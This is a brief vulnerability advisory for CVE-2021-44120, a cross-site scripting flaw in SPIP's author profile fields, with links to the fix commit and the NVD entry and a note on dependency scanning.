CVE-2021-44120: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

January 26, 2022 (updated February 1, 2022)

SPIP is affected by a Cross Site Scripting (XSS) vulnerability in ecrire/public/interfaces.php, adding the function safehtml to the vulnerable fields. An editor is able to modify his personal information. If the editor has an article written and available, when a user goes to the public site and wants to read the author’s information, the malicious code will be executed. The Who are you and Website Name fields are vulnerable.

References

git.spip.net/spip/spip/commit/d548391d799387d1e93cf1a369d385c72f7d5c81
nvd.nist.gov/vuln/detail/CVE-2021-44120

Code Behaviors & Features

Detect and mitigate CVE-2021-44120 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →